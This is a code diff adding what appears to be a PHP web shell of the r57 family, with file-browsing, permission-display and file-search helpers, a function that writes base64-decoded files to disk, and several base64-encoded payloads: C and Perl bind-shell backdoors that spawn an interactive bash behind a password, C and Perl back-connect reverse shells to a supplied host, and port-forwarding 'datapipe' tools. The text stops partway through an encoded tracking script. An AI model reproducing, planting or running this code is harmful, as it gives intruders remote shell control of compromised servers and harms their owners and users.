+if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
